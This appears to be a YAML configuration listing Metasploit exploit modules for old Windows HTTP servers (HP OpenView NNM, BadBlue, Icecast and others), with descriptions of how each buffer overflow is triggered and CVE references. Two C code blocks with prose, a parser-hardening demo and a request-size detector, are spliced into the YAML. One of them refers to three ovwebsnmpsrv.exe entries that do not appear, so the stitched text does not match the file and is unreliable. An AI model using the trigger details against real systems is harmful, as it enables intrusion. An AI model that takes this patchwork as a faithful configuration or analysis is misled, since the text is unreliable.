\t\t\t\t\tThis module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53\n\
\t\t\t\tprior to NNM_01203. By making a specially crafted HTTP request to the \"snmpviewer.exe\"\n\
\t\t\t\tCGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary\n\
\t\t\t\tcode.\n\n\
\t\t\t\tThe vulnerable code lies within a function within \"snmpviewer.exe\" with a\n\
\t\t\t\ttimestamp prior to April 7th, 2010. This vulnerability is triggerable via either a GET\n\
\t\t\t\tor POST request. The request must contain 'act' and 'app' parameters which, when\n\
\t\t\t\tcombined, total more than the 1024 byte stack buffer can hold.\n\n\
\t\t\t\tIt is important to note that this vulnerability must be exploited by overwriting SEH.\n\
\t\t\t\tWhile the saved return address can be smashed, a function call that occurs before\n\
\t\t\t\tthe function returns calls \"exit\".\n\
\t\t\t"
authors:
- - CVE
- 2010-1552
- - OSVDB
- "64975"
- - BID
- "40068"
- - URL
- http://www.zerodayinitiative.com/advisories/ZDI-10-083/
- - URL
- http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02153379
path: extensions/metasploit/
class: Msf_module
msf_mailenable_auth_header:
enable: true
msf: true
msf_key: windows/http/mailenable_auth_header
name: MailEnable Authorization Header Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a remote buffer overflow in the MailEnable web service.\n\
\t\t\t\tThe vulnerability is triggered when a large value is placed into the Authorization\n\
\t\t\t\theader of the web request. MailEnable Enterprise Edition versions prior to 1.0.5 and\n\
\t\t\t\tMailEnable Professional versions prior to 1.55 are affected.\n\
\t\t\t"
authors:
- - CVE
- 2005-1348
- - OSVDB
- "15913"
- - OSVDB
- "15737"
- - BID
- "13350"
- - NSS
- "18123"
path: extensions/metasploit/
class: Msf_module
msf_efs_easychatserver_username:
enable: true
msf: true
msf_key: windows/http/efs_easychatserver_username
name: EFS Easy Chat Server Authentication Request Handling Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in EFS Software Easy Chat Server. By\n\
\t\t\t\tsending a overly long authentication request, an attacker may be able to execute\n\
\t\t\t\tarbitrary code.\n\n\
\t\t\t\tNOTE: The offset to SEH is influenced by the installation path of the program.\n\
\t\t\t\tThe path, which defaults to \"C:\\Program Files\\Easy Chat Server\", is concatenated\n\
\t\t\t\twith \"\\users\\\" and the string passed as the username HTTP parameter.\n\
\t\t\t"
authors:
- - CVE
- 2004-2466
- - OSVDB
- "7416"
- - BID
- "25328"
path: extensions/metasploit/
class: Msf_module
msf_apache_modjk_overflow:
enable: true
msf: true
msf_key: windows/http/apache_modjk_overflow
name: Apache mod_jk 1.2.20 Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis is a stack buffer overflow exploit for mod_jk 1.2.20.\n\
\t\t\t\tShould work on any Win32 OS.\n\
\t\t\t"
authors:
- - CVE
- 2007-0774
- - OSVDB
- "33855"
- - BID
- "22791"
- - URL
- http://www.zerodayinitiative.com/advisories/ZDI-07-008.html
path: extensions/metasploit/
class: Msf_module
msf_hp_nnm_toolbar_02:
enable: true
msf: true
msf_key: windows/http/hp_nnm_toolbar_02
name: HP OpenView Network Node Manager Toolbar.exe CGI Cookie Handling Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.0\n\
\t\t\t\tand 7.53. By sending a CGI request with a specially crafted OvOSLocale cookie to Toolbar.exe, an\n\
\t\t\t\tattacker may be able to execute arbitrary code. Please note that this module only works\n\
\t\t\t\tagainst a specific build (ie. NNM 7.53_01195)\n\
\t\t\t"
authors:
- - CVE
- 2009-0920
- - OSVDB
- "53242"
- - BID
- "34294"
- - URL
- http://www.coresecurity.com/content/openview-buffer-overflows
path: extensions/metasploit/
class: Msf_module
msf_oracle9i_xdb_pass:
enable: true
msf: true
msf_key: windows/http/oracle9i_xdb_pass
name: Oracle 9i XDB HTTP PASS Overflow (win32)
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the authorization\n\
\t\t\t\tcode of the Oracle 9i HTTP XDB service. David Litchfield\n\
\t\t\t\thas illustrated multiple vulnerabilities in the Oracle\n\
\t\t\t\t9i XML Database (XDB), during a seminar on \"Variations\n\
\t\t\t\tin exploit methods between Linux and Windows\" presented\n\
\t\t\t\tat the Blackhat conference.\n\
\t\t\t"
authors:
- - CVE
- 2003-0727
- - OSVDB
- "2449"
- - BID
- "8375"
- - URL
- http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf
path: extensions/metasploit/
class: Msf_module
msf_hp_nnm_nnmrptconfig_schdparams:
enable: true
msf: true
msf_key: windows/http/hp_nnm_nnmrptconfig_schdparams
name: HP OpenView NNM nnmRptConfig.exe schdParams Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits NNM's nnmRptConfig.exe. Similar to other NNM CGI bugs,\n\
\t\t\t\tthe overflow occurs during a ov.sprintf_new() call, which allows an attacker to\n\
\t\t\t\toverwrite data on the stack, and gain arbitrary code execution.\n\
\t\t\t"
authors:
- - CVE
- 2011-0267
- - OSVDB
- "70473"
- - URL
- http://www.zerodayinitiative.com/advisories/ZDI-11-009/
path: extensions/metasploit/
class: Msf_module
msf_webster_http:
enable: true
msf: true
msf_key: windows/http/webster_http
name: Webster HTTP Server GET Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis exploits a stack buffer overflow in the Webster HTTP server.\n\
\t\t\t\t\tThe server and source code was released within an article from\n\
\t\t\t\t\tthe Microsoft Systems Journal in February 1996 titled \"Write a\n\
\t\t\t\t\tSimple HTTP-based Server Using MFC and Windows Sockets\".\n\
\t\t\t"
authors:
- - CVE
- 2002-2268
- - OSVDB
- "44106"
- - BID
- "6289"
- - URL
- http://www.microsoft.com/msj/archive/s25f.aspx
- - URL
- http://www.netdave.com/webster/webster.htm
path: extensions/metasploit/
class: Msf_module
msf_httpdx_handlepeer:
enable: true
msf: true
msf_key: windows/http/httpdx_handlepeer
name: HTTPDX h_handlepeer() Function Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack-based buffer overflow vulnerability in HTTPDX HTTP server 1.4. The\n\
\t\t\t\tvulnerability is caused due to a boundary error within the \"h_handlepeer()\" function in http.cpp.\n\
\t\t\t\tBy sending an overly long HTTP request, an attacker can overrun a buffer and execute arbitrary code.\n\
\t\t\t"
authors:
- - OSVDB
- "58714"
- - CVE
- 2009-3711
- - URL
- http://www.pank4j.com/exploits/httpdxb0f.php
- - URL
- http://www.rec-sec.com/2009/10/16/httpdx-buffer-overflow-exploit/
path: extensions/metasploit/
class: Msf_module
msf_hp_nnm_getnnmdata_maxage:
enable: true
msf: true
msf_key: windows/http/hp_nnm_getnnmdata_maxage
name: HP OpenView Network Node Manager getnnmdata.exe (MaxAge) CGI Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in HP OpenView Network Node Manager 7.50/7.53.\n\
\t\t\t\tBy sending specially crafted MaxAge parameter to the getnnmdata.exe CGI,\n\
\t\t\t\tan attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2010-1553
- - OSVDB
- "64976"
path: extensions/metasploit/
class: Msf_module
msf_hp_openview_insight_backdoor:
enable: true
msf: true
msf_key: windows/http/hp_openview_insight_backdoor
name: HP OpenView Performance Insight Server Backdoor Account Code Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a hidden account in the com.trinagy.security.XMLUserManager Java\n\
\t\t\t\tclass. When using this account, an attacker can abuse the \n\
\t\t\t\tcom.trinagy.servlet.HelpManagerServlet class and write arbitrary files to the system\n\
\t\t\t\tallowing the execution of arbitrary code.\n\n\
\t\t\t\tNOTE: This module has only been tested against HP OpenView Performance Insight Server 5.41.0\n\
\t\t\t"
authors:
- - CVE
- 2011-0276
- - OSVDB
- "70754"
path: extensions/metasploit/
class: Msf_module
msf_bea_weblogic_transfer_encoding:
enable: true
msf: true
msf_key: windows/http/bea_weblogic_transfer_encoding
name: BEA Weblogic Transfer-Encoding Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack based buffer overflow in the BEA\n\
\t\t\t\tWeblogic Apache plugin. This vulnerability exists in the\n\
\t\t\t\terror reporting for unknown Transfer-Encoding headers.\n\
\t\t\t\tYou may have to run this twice due to timing issues with handlers.\n\
\t\t\t"
authors:
- - CVE
- 2008-4008
- - OSVDB
- "49283"
- - URL
- http://support.bea.com/application_content/product_portlets/securityadvisories/2806.html
path: extensions/metasploit/
class: Msf_module
msf_icecast_header:
enable: true
msf: true
msf_key: windows/http/icecast_header
name: Icecast (<= 2.0.1) Header Overwrite (win32)
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in the header parsing\n\
\t\t\t\tof Icecast, discovered by Luigi Auriemma. Sending 32 HTTP\n\
\t\t\t\theaders will cause a write one past the end of a pointer\n\
\t\t\t\tarray. On win32 this happens to overwrite the saved\n\
\t\t\t\tinstruction pointer, and on Linux (depending on compiler,\n\
\t\t\t\tetc.) this seems to generally overwrite nothing crucial (read:\n\
\t\t\t\tnot exploitable).\n\n\
\t\t\t\t!! This exploit uses ExitThread(), this will leave icecast\n\
\t\t\t\tthinking the thread is still in use, and the thread counter\n\
\t\t\t\twon't be decremented. This means for each time your payload\n\
\t\t\t\texits, the counter will be left incremented, and eventually\n\
\t\t\t\tthe threadpool limit will be maxed. So you can multihit,\n\
\t\t\t\tbut only till you fill the threadpool.\n\n\
\t\t\t"
authors:
- - CVE
- 2004-1561
- - OSVDB
- "10406"
- - BID
- "11271"
- - URL
- http://archives.neohapsis.com/archives/bugtraq/2004-09/0366.html
path: extensions/metasploit/
class: Msf_module
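The "write one past the end of a pointer array" in the Icecast entry, shown as an added illustration in C (not Icecast's code and not the Metasploit module): a header parser keeps a fixed array of 32 pointers, stores one header per slot, and then writes its terminating NULL at index i, which equals 32 once 32 headers have been read. The array size, function names and the constructed request are assumptions for the demo; the vulnerable parser is given one spare slot so the stray write can be observed instead of corrupting the demo's own stack. The hardened version reserves a slot for the terminator and rejects the request once it is full, which is also the check a front-end proxy can apply.

```c
#include <stdio.h>
#include <string.h>

#define MAX_HEADERS 32   /* assumed size of the header pointer array */

/* Count header lines between the request line and the blank line.
   Returns -1 if the request is not terminated. */
int count_header_lines(const char *req)
{
    const char *p = strstr(req, "\r\n");
    if (!p) return -1;
    p += 2;
    int n = 0;
    while (strncmp(p, "\r\n", 2) != 0) {
        const char *eol = strstr(p, "\r\n");
        if (!eol) return -1;
        n++;
        p = eol + 2;
    }
    return n;
}

/* Vulnerable pattern, instrumented.  Real code would declare
   `const char *hdrs[MAX_HEADERS]`; the spare slot lets the demo observe
   the stray write.  The loop fills slots 0..31 and then writes the
   terminating NULL at index i; after 32 headers i == MAX_HEADERS, which
   on a 32-slot array is the one-past-the-end write.  Returns the index
   the NULL was written to. */
int vuln_parse_headers(const char *req)
{
    const char *hdrs[MAX_HEADERS + 1];   /* +1 is instrumentation only */
    const char *p = strstr(req, "\r\n");
    if (!p) return -1;
    p += 2;
    int i;
    for (i = 0; i < MAX_HEADERS; i++) {
        if (strncmp(p, "\r\n", 2) == 0) break;   /* blank line: done */
        const char *eol = strstr(p, "\r\n");
        if (!eol) return -1;
        hdrs[i] = p;
        p = eol + 2;
    }
    hdrs[i] = NULL;                      /* i == 32 -> off by one */
    return hdrs[i] == NULL ? i : -1;
}

/* Hardened: reserve a slot for the terminator and reject the request
   once it is full, rather than truncating silently. */
int safe_parse_headers(const char *req, const char **hdrs, size_t cap)
{
    if (cap == 0) return -1;
    const char *p = strstr(req, "\r\n");
    if (!p) return -1;
    p += 2;
    size_t i = 0;
    while (strncmp(p, "\r\n", 2) != 0) {
        const char *eol = strstr(p, "\r\n");
        if (!eol) return -1;             /* unterminated header block */
        if (i + 1 >= cap) return -1;     /* no room for header + NULL */
        hdrs[i++] = p;
        p = eol + 2;
    }
    hdrs[i] = NULL;
    return (int)i;
}

/* Constructed input: a GET with n "X-Pad-k: a" headers.  Returns bytes written. */
size_t build_request(char *buf, size_t sz, int n)
{
    size_t off = (size_t)snprintf(buf, sz, "GET / HTTP/1.0\r\n");
    for (int k = 0; k < n && off < sz; k++)
        off += (size_t)snprintf(buf + off, sz - off, "X-Pad-%d: a\r\n", k);
    if (off < sz)
        off += (size_t)snprintf(buf + off, sz - off, "\r\n");
    return off;
}

/* Build an n-header request and run each parser on it. */
int vuln_index_for(int nheaders)
{
    char buf[4096];
    build_request(buf, sizeof buf, nheaders);
    return vuln_parse_headers(buf);
}

int safe_result_for(int nheaders)
{
    char buf[4096];
    const char *hdrs[MAX_HEADERS];
    build_request(buf, sizeof buf, nheaders);
    return safe_parse_headers(buf, hdrs, MAX_HEADERS);
}

int main(void)
{
    for (int n = 30; n <= 33; n++)
        printf("%d headers: vulnerable writes NULL at [%d], hardened returns %d\n",
               n, vuln_index_for(n), safe_result_for(n));
    return 0;
}
```

Note that 31 headers are handled identically by both parsers; the bug is invisible until the array is exactly full, which is why a cap check that counts the terminator slot, not just the data slots, matters.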
msf_amlibweb_webquerydll_app:
enable: true
msf: true
msf_key: windows/http/amlibweb_webquerydll_app
name: Amlibweb NetOpacs webquery.dll Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Amlib's Amlibweb\n\
\t\t\t\tLibrary Management System (NetOpacs). The webquery.dll\n\
\t\t\t\tAPI is available through IIS requests. By specifying\n\
\t\t\t\tan overly long string to the 'app' parameter, SEH can be\n\
\t\t\t\treliably overwritten allowing for arbitrary remote code execution.\n\
\t\t\t\tIn addition, it is possible to overwrite EIP by specifying\n\
\t\t\t\tan arbitrary parameter name with an '=' terminator.\n\
\t\t\t"
authors:
- - OSVDB
- "66814"
- - URL
- http://www.aushack.com/advisories/
path: extensions/metasploit/
class: Msf_module
msf_hp_nnm_toolbar_01:
enable: true
msf: true
msf_key: windows/http/hp_nnm_toolbar_01
name: HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50.\n\
\t\t\t\tBy sending a specially crafted CGI request to Toolbar.exe, an attacker may be able to execute\n\
\t\t\t\tarbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2008-0067
- - OSVDB
- "53222"
- - BID
- "33147"
path: extensions/metasploit/
class: Msf_module
msf_edirectory_imonitor:
enable: true
msf: true
msf_key: windows/http/edirectory_imonitor
name: eDirectory 8.7.3 iMonitor Remote Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in eDirectory 8.7.3\n\
\t\t\t\tiMonitor service. This vulnerability was discovered by Peter\n\
\t\t\t\tWinter-Smith of NGSSoftware.\n\n\
\t\t\t\tNOTE: repeated exploitation attempts may cause eDirectory to crash. It does\n\
\t\t\t\tnot restart automatically in a default installation.\n\
\t\t\t"
authors:
- - CVE
- 2005-2551
- - OSVDB
- "18703"
- - BID
- "14548"
path: extensions/metasploit/
class: Msf_module
msf_altn_webadmin:
enable: true
msf: true
msf_key: windows/http/altn_webadmin
name: Alt-N WebAdmin USER Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tAlt-N WebAdmin is prone to a buffer overflow condition. This\n\
\t\t\t\tis due to insufficient bounds checking on the USER\n\
\t\t\t\tparameter. Successful exploitation could result in code\n\
\t\t\t\texecution with SYSTEM level privileges.\n\
\t\t\t"
authors:
- - CVE
- 2003-0471
- - OSVDB
- "2207"
- - BID
- "8024"
- - NSS
- "11771"
path: extensions/metasploit/
class: Msf_module
msf_bea_weblogic_jsessionid:
enable: true
msf: true
msf_key: windows/http/bea_weblogic_jsessionid
name: BEA WebLogic JSESSIONID Cookie Value Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in BEA's WebLogic plugin. The vulnerable\n\
\t\t\t\tcode is only accessible when clustering is configured. A request containing a\n\
\t\t\t\tlong JSESSIONID cookie value can lead to arbitrary code execution.\n\
\t\t\t"
authors:
- - CVE
- 2008-5457
- - OSVDB
- "51311"
path: extensions/metasploit/
class: Msf_module
msf_mcafee_epolicy_source:
enable: true
msf: true
msf_key: windows/http/mcafee_epolicy_source
name: McAfee ePolicy Orchestrator / ProtectionPilot Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis is an exploit for the McAfee HTTP Server (NAISERV.exe).\n\
\t\t\t\tMcAfee ePolicy Orchestrator 2.5.1 through 3.5.0 and ProtectionPilot 1.1.0 are\n\
\t\t\t\tknown to be vulnerable. By sending a large 'Source' header, the stack can\n\
\t\t\t\tbe overwritten. This module is based on the exploit by xbxice and muts.\n\
\t\t\t\tDue to size constraints, this module uses the Egghunter technique.\n\
\t\t\t"
authors:
- - CVE
- 2006-5156
- - OSVDB
- "29421"
- - URL
- http://www.milw0rm.com/exploits/2467
- - URL
- http://www.remote-exploit.org/advisories/mcafee-epo.pdf
- - BID
- "20288"
path: extensions/metasploit/
class: Msf_module
msf_hp_nnm_ovwebsnmpsrv_ovutil:
enable: true
msf: true
msf_key: windows/http/hp_nnm_ovwebsnmpsrv_ovutil
name: HP OpenView Network Node Manager ovwebsnmpsrv.exe ovutil Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53\n\
\t\t\t\tprior to NNM_01203. By specifying a long 'arg' parameter when executing the 'jovgraph.exe'\n\
\t\t\t\tCGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code.\n\n\
\t\t\t\tThis vulnerability is triggerable via either a GET or POST request. It is interesting to\n\
\t\t\t\tnote that this vulnerability cannot be exploited by overwriting SEH, since attempting\n\
\t\t\t\tto would trigger CVE-2010-1964.\n\n\
\t\t\t\tThe vulnerable code is within a sub-function called from \"main\" within \"ovwebsnmpsrv.exe\"\n\
\t\t\t\twith a timestamp prior to April 7th, 2010. This function contains a 256 byte stack buffer\n\
\t\t\t\twhich is passed to the \"getProxiedStorageAddress\" function within ovutil.dll. When\n\
\t\t\t\tprocessing the address results in an error, the buffer is overflowed in a call to sprintf_new.\n\
\t\t\t\tThere are no stack cookies present, so exploitation is easily achieved by overwriting the\n\
\t\t\t\tsaved return address.\n\n\
\t\t\t\tThere exists some unreliability when running this exploit. It is not completely clear why\n\
\t\t\t\tat this time, but may be related to OVWDB or session management. Also, on some attempts\n\
\t\t\t\tOV NNM may report invalid characters in the URL. It is not clear what is causing this\n\
\t\t\t\teither.\n\
\t\t\t"
authors:
- - CVE
- 2010-1961
- - OSVDB
- "65428"
- - BID
- "40638"
- - URL
- http://www.zerodayinitiative.com/advisories/ZDI-10-106/
- - URL
- http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02217439
path: extensions/metasploit/
class: Msf_module
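The three ovwebsnmpsrv.exe entries above (the main() overflow, the unrecognized-option overflow and the ovutil overflow) all reach the vulnerable binary through the 'arg' parameter of the jovgraph.exe CGI, and the descriptions give concrete shape constraints: a 1024-byte stack buffer in main(), and for the option-parsing bug a dash-prefixed value that, with some static text, exceeds 10240 bytes. The following added example (my code, not HP's and not the Metasploit modules') decodes the parameter from a query string or POST body and classifies the request by those constraints. It assumes legitimate 'arg' values are far shorter than 1 KiB and that the CGI path contains "jovgraph.exe"; the function names and the constructed inputs are assumptions for the demo.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Percent-decode one application/x-www-form-urlencoded parameter from a
   query string or POST body into out.  Returns the decoded length,
   -1 if the parameter is absent, -2 if it does not fit in out. */
int extract_form_param(const char *body, const char *name,
                       char *out, size_t outsz)
{
    size_t nlen = strlen(name);
    const char *p = body;
    while (p && *p) {
        if (strncmp(p, name, nlen) == 0 && p[nlen] == '=') {
            p += nlen + 1;
            size_t o = 0;
            while (*p && *p != '&') {
                unsigned c = (unsigned char)*p;
                if (c == '%' && isxdigit((unsigned char)p[1])
                             && isxdigit((unsigned char)p[2])) {
                    sscanf(p + 1, "%2x", &c);
                    p += 3;
                } else {
                    if (c == '+') c = ' ';
                    p++;
                }
                if (o + 1 >= outsz) return -2;
                out[o++] = (char)c;
            }
            out[o] = '\0';
            return (int)o;
        }
        p = strchr(p, '&');
        if (p) p++;
    }
    return -1;
}

enum { ARG_OK = 0, ARG_OVER_1024 = 1, ARG_DASH_OVER_10240 = 2 };

/* Classify a request to the jovgraph.exe CGI (the front end for
   ovwebsnmpsrv.exe) by its decoded 'arg' parameter.  Thresholds come from
   the module descriptions: the 1024-byte buffer in main() and the
   >10240-byte, dash-prefixed value needed for the option-parsing bug. */
int ovwebsnmpsrv_arg_risk(const char *path, const char *params)
{
    static char arg[16384];
    if (strstr(path, "jovgraph.exe") == NULL) return ARG_OK;
    int len = extract_form_param(params, "arg", arg, sizeof arg);
    if (len == -1) return ARG_OK;
    if (len == -2) return ARG_OVER_1024;             /* too big to decode */
    if (len > 10240 && arg[0] == '-') return ARG_DASH_OVER_10240;
    if (len > 1024) return ARG_OVER_1024;
    return ARG_OK;
}

/* Constructed input: "arg=" + optional '-' + 'A' padding + another
   parameter, classified as a request to jovgraph.exe. */
int risk_for(int dash, size_t arglen)
{
    static char body[16384];
    size_t off = (size_t)snprintf(body, sizeof body, "arg=");
    if (dash && arglen > 0) { body[off++] = '-'; arglen--; }
    for (; arglen > 0 && off < sizeof body - 16; arglen--) body[off++] = 'A';
    snprintf(body + off, sizeof body - off, "&sessionID=1");
    return ovwebsnmpsrv_arg_risk("/OvCgi/jovgraph.exe", body);
}

/* Returns 1 if `name` in `params` decodes to exactly `expect`. */
int decoded_equals(const char *params, const char *name, const char *expect)
{
    char out[256];
    int n = extract_form_param(params, name, out, sizeof out);
    return n >= 0 && strcmp(out, expect) == 0;
}

int main(void)
{
    printf("short arg:        %d\n", risk_for(0, 12));
    printf("2000 bytes:       %d\n", risk_for(0, 2000));
    printf("dash, 10300 bytes: %d\n", risk_for(1, 10300));
    return 0;
}
```

Decoding before measuring matters: a percent-encoded value is roughly three times longer on the wire than in the buffer it lands in, so a length check on the raw body would over-count, while a check on the decoded value matches what the CGI actually copies.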
msf_intersystems_cache:
enable: true
msf: true
msf_key: windows/http/intersystems_cache
name: InterSystems Cache UtilConfigHome.csp Argument Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in InterSystems Cache 2009.1.\n\
\t\t\t\tBy sending a specially crafted GET request, an attacker may be able to execute\n\
\t\t\t\tarbitrary code.\n\
\t\t\t"
authors:
- - OSVDB
- "60549"
- - BID
- "37177"
path: extensions/metasploit/
class: Msf_module
msf_integard_password_bof:
enable: true
msf: true
msf_key: windows/http/integard_password_bof
name: Race River Integard Home/Pro LoginAdmin Password Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\t\tThis module exploits a stack buffer overflow in Race River's Integard Home/Pro\n\
\t\t\t\t\tinternet content filter HTTP Server. Versions prior to 2.0.0.9037 and 2.2.0.9037 are\n\
\t\t\t\t\tvulnerable.\n\n\
\t\t\t\t\tThe administration web page on port 18881 is vulnerable to a remote buffer overflow\n\
\t\t\t\t\tattack. By sending a long character string in the password field, both the structured\n\
\t\t\t\t\texception handler and the saved extended instruction pointer are overwritten, allowing\n\
\t\t\t\t\tan attacker to gain control of the application and the underlying operating system\n\
\t\t\t\t\tremotely.\n\n\
\t\t\t\t\tThe administration website service runs with SYSTEM privileges, and automatically\n\
\t\t\t\t\trestarts when it crashes.\n\
\t\t\t"
authors:
- - OSVDB
- "67909"
- - URL
- http://www.corelan.be:8800/advisories.php?id=CORELAN-10-061
path: extensions/metasploit/
class: Msf_module
msf_hp_nnm_getnnmdata_hostname:
enable: true
msf: true
msf_key: windows/http/hp_nnm_getnnmdata_hostname
name: HP OpenView Network Node Manager getnnmdata.exe (Hostname) CGI Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in HP OpenView Network Node Manager 7.50/7.53.\n\
\t\t\t\tBy sending specially crafted Hostname parameter to the getnnmdata.exe CGI,\n\
\t\t\t\tan attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2010-1555
- - OSVDB
- "64976"
path: extensions/metasploit/
class: Msf_module
msf_nowsms:
enable: true
msf: true
msf_key: windows/http/nowsms
name: Now SMS/MMS Gateway Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Now SMS/MMS Gateway v2007.06.27.\n\
\t\t\t\tBy sending a specially crafted GET request, an attacker may be able to execute\n\
\t\t\t\tarbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2008-0871
- - OSVDB
- "42953"
- - BID
- "27896"
path: extensions/metasploit/
class: Msf_module
msf_sambar6_search_results:
enable: true
msf: true
msf_key: windows/http/sambar6_search_results
name: Sambar 6 Search Results Buffer Overflow
category: Metasploit
description: "\n\
\t\t\tThis module exploits a buffer overflow found in the\n\
\t\t\t/search/results.stm application that comes with Sambar 6.\n\
\t\t\tThis code is a direct port of Andrew Griffiths's SMUDGE\n\
\t\t\texploit, the only changes made were to the nops and payload.\n\
\t\t\tThis exploit causes the service to die, whether you provided\n\
\t\t\tthe correct target or not.\n\
\t\t\t"
authors:
- - CVE
- 2004-2086
- - OSVDB
- "5786"
- - BID
- "9607"
path: extensions/metasploit/
class: Msf_module
msf_kolibri_http:
enable: true
msf: true
msf_key: windows/http/kolibri_http
name: Kolibri <= v2.0 HTTP Server HEAD Buffer Overflow
category: Metasploit
description: This exploits a stack buffer overflow in version 2 of the Kolibri HTTP server.
authors:
- - CVE
- 2002-2268
- - OSVDB
- "70808"
- - BID
- "6289"
- - URL
- http://www.exploit-db.com/exploits/15834/
path: extensions/metasploit/
class: Msf_module
msf_ca_igateway_debug:
enable: true
msf: true
msf_key: windows/http/ca_igateway_debug
name: CA iTechnology iGateway Debug Mode Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability in the Computer Associates\n\
\t\t\t\tiTechnology iGateway component. When <Debug>True</Debug> is enabled\n\
\t\t\t\tin igateway.conf (non-default), it is possible to overwrite the stack\n\
\t\t\t\tand execute code remotely. This module works best with Ordinal payloads.\n\
\t\t\t"
authors:
- - CVE
- 2005-3190
- - OSVDB
- "19920"
- - URL
- http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=33485
- - URL
- http://www.milw0rm.com/exploits/1243
- - BID
- "15025"
path: extensions/metasploit/
class: Msf_module
msf_shttpd_post:
enable: true
msf: true
msf_key: windows/http/shttpd_post
name: SHTTPD <= 1.34 URI-Encoded POST Request Overflow (win32)
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in SHTTPD <= 1.34.\n\
\t\t\t\tThe vulnerability is caused due to a boundary error within the\n\
\t\t\t\thandling of POST requests. Based on an original exploit by skOd\n\
\t\t\t\tbut using a different method found by hdm.\n\
\t\t\t"
authors:
- - CVE
- 2006-5216
- - OSVDB
- "29565"
- - URL
- http://shttpd.sourceforge.net
- - BID
- "20393"
path: extensions/metasploit/
class: Msf_module
msf_badblue_passthru:
enable: true
msf: true
msf_key: windows/http/badblue_passthru
name: BadBlue 2.72b PassThru Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the PassThru\n\
\t\t\t\tfunctionality in ext.dll in BadBlue 2.72b and earlier.\n\
\t\t\t"
authors:
- - CVE
- 2007-6377
- - OSVDB
- "42416"
- - BID
- "26803"
path: extensions/metasploit/
class: Msf_module
msf_hp_nnm_nnmrptconfig_nameparams:
enable: true
msf: true
msf_key: windows/http/hp_nnm_nnmrptconfig_nameparams
name: HP OpenView NNM nnmRptConfig nameParams Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a vulnerability in HP NNM's nnmRptConfig.exe.\n\
\t\t\t\tA remote user can send a long string of data to the nameParams parameter via\n\
\t\t\t\ta POST request, which causes an overflow on the stack when function\n\
\t\t\t\tov.sprintf_new() is used, and gain arbitrary code execution.\n\
\t\t\t"
authors:
- - CVE
- 2011-0266
- - URL
- http://www.zerodayinitiative.com/advisories/ZDI-11-008/
path: extensions/metasploit/
class: Msf_module
msf_edirectory_host:
enable: true
msf: true
msf_key: windows/http/edirectory_host
name: Novell eDirectory NDS Server Host Header Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Novell eDirectory 8.8.1.\n\
\t\t\t\tThe web interface does not validate the length of the\n\
\t\t\t\tHTTP Host header prior to using the value of that header in an\n\
\t\t\t\tHTTP redirect.\n\
\t\t\t"
authors:
- - CVE
- 2006-5478
- - OSVDB
- "29993"
- - BID
- "20655"
path: extensions/metasploit/
class: Msf_module
msf_badblue_ext_overflow:
enable: true
msf: true
msf_key: windows/http/badblue_ext_overflow
name: BadBlue 2.5 EXT.dll Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis is a stack buffer overflow exploit for BadBlue version 2.5.\n\
\t\t\t"
authors:
- - CVE
- 2005-0595
- - OSVDB
- "14238"
- - BID
- "7387"
path: extensions/metasploit/
class: Msf_module
msf_novell_imanager_upload:
enable: true
msf: true
msf_key: windows/http/novell_imanager_upload
name: Novell iManager getMultiPartParameters Arbitrary File Upload
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a directory traversal vulnerability which\n\
\t\t\t\tallows remote attackers to upload and execute arbitrary code.\n\n\
\t\t\t\tPortalModuleInstallManager\n\
\t\t\t"
authors:
- - OSVDB
- "68320"
- - URL
- http://www.zerodayinitiative.com/advisories/ZDI-10-190/
